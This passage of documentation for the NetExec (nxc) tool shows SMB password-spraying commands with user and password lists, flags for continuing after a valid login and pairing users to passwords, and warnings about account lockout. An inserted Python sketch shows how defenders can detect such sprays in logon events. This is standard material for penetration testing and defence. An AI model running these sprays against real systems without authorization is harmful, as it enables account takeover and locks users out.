Password Spraying

Using Username/Password Lists

You can supply multiple usernames or passwords by separating them with spaces.

nxc smb <TARGET> -u user1 user2 user3 -p <PASSWORD>
nxc smb <TARGET> -u user1 -p <PASSWORD> password2 password3

nxc accepts text files of usernames and passwords, with one username or password per line. Watch out for account lockout!

nxc smb <TARGET> -u <USERFILE> -p <PASSWORD>
nxc smb <TARGET> -u <USERNAME> -p <PASSFILE>

Warning

By default, nxc exits as soon as a successful login is found. With the --continue-on-success flag, it continues spraying even after a valid password is found. This is useful for spraying a single password against a large user list. The flag is incompatible with command execution.

Usage example:

nxc smb <TARGET> -u <USERFILE> -p <PASSWORD> --continue-on-success
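From the defender's side, the single-password spray with --continue-on-success described above shows up as one source failing against many distinct accounts, only once or twice each, sometimes with a successful logon in between. The following Python sketch of that detection is an added example, not part of NetExec or the original page; the event tuples, IP addresses, account names and thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logon events: (timestamp, source IP, account, success).
EVENTS = [
    ("2024-05-01T09:00:01", "10.0.0.50", "alice", False),
    ("2024-05-01T09:00:02", "10.0.0.50", "bob", False),
    ("2024-05-01T09:00:03", "10.0.0.50", "carol", True),
    ("2024-05-01T09:00:04", "10.0.0.50", "dave", False),
    ("2024-05-01T09:00:05", "10.0.0.50", "erin", False),
    ("2024-05-01T09:00:06", "10.0.0.50", "frank", False),
    # A user mistyping their own password: many failures, but a single account.
    ("2024-05-01T09:01:00", "10.0.0.7", "grace", False),
    ("2024-05-01T09:01:05", "10.0.0.7", "grace", False),
    ("2024-05-01T09:01:09", "10.0.0.7", "grace", False),
    ("2024-05-01T09:01:15", "10.0.0.7", "grace", True),
]

def detect_spray(events, window=timedelta(minutes=5), min_users=4, max_per_user=2):
    """Flag sources that fail against many accounts, few tries each, in one window."""
    by_src = defaultdict(list)
    for ts, src, user, ok in events:
        by_src[src].append((datetime.fromisoformat(ts), user, ok))

    alerts = []
    for src, rows in by_src.items():
        rows.sort()
        for t0, _, _ in rows:
            # All events from this source within `window` of the candidate start time.
            win = [r for r in rows if t0 <= r[0] <= t0 + window]
            fails = defaultdict(int)
            for _, user, ok in win:
                if not ok:
                    fails[user] += 1
            # Wide (many accounts) and shallow (few tries per account) means spray,
            # as opposed to a brute force or a typo against a single account.
            if len(fails) >= min_users and max(fails.values()) <= max_per_user:
                alerts.append({
                    "source": src,
                    "failed_accounts": sorted(fails),
                    # Successes inside the spray window are accounts to reset first.
                    "valid_logons": sorted({u for _, u, ok in win if ok}),
                })
                break
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

Keeping max_per_user below the domain lockout threshold is what lets this catch sprays that never trigger a lockout.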

Checking 'username == password' using a wordlist

nxc smb <TARGET> -u <USERFILE> -p <PASSFILE> --no-bruteforce --continue-on-success

Checking multiple usernames/passwords using a wordlist

nxc smb <TARGET> -u <USERFILE> -p <PASSFILE>

The result will be:

  • user1 => password1
  • user1 => password2
  • user2 => password1
  • user2 => password2

Danger

Be careful not to lock out accounts when using this technique.

Checking one login equals one password using a wordlist

Success

No brute force is possible with this one, as 1 user = 1 password.

nxc smb <TARGET> -u <USERFILE> -p <PASSFILE> --no-bruteforce --continue-on-success

The result will be:

  • user1 => password1
  • user2 => password2

Danger

Avoid using a range or a list of IPs when using the --no-bruteforce option.